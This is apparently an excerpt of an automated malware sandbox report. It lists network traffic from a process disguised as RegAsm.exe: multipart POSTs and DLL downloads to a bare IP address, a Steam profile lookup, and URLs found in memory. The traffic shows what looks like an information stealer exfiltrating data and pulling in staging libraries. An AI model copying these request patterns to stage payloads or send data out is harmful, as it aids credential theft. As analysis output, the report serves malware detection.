                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AECAKECAEGDHIECBGHIIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 116501Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JJDGCGHCGHCBFHJJKKJEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAAAFBKECAKEHIEBAFIEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040514C _EH_prolog,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,lstrlenA,lstrlenA,GetProcessHeap,HeapAlloc,lstrlenA,memcpy,lstrlenA,lstrlenA,memcpy,lstrlenA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,
                  Source: global trafficHTTP traffic detected: GET /profiles/76561199686524322 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /sqlx.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                  Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGHJEBGHJKEBFHIJDHCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0A
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0C
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0N
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0X
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                  Source: RegAsm.exe, 00000003.00000002.2044042072.000000001928D000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.3.drString found in binary or memory: http://www.sqlite.org/copyright.html.
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                  Source: 76561199686524322[1].htm.3.drString found in binary or memory: https://95.217.240.101
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/freebl3.dll
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/freebl3.dlls
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/mozglue.dll
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/msvcp140.dll
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/msvcp140.dllU
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/nss3.dll
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/nss3.dll2
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/softokn3.dll
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/softokn3.dllK
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/sqlx.dll
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/v
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/vcruntime140.dll
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101FIE
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101KJE
                  Source: JEGHDA.3.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: 76561199686524322[1].htm.3.drString found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000001068000.00000004.00000020.00020000.00000000.sdmp, IIDHJD.3.drString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000001068000.00000004.00000020.00020000.00000000.sdmp, IIDHJD.3.drString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                  Source: JEGHDA.3.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: JEGHDA.3.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: JEGHDA.3.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=5CgcHEsWGA
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&l=english&am
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=engli
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh&
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&l=en
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=yF_q
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&l=englis
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&l=
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=engli
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=X93cgZRtuH6z&l=engli
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=dERfFkkJ-bKK&amp
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&l=engl
                  Source: 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=2VoZa2M8Wh3k&
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/he
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
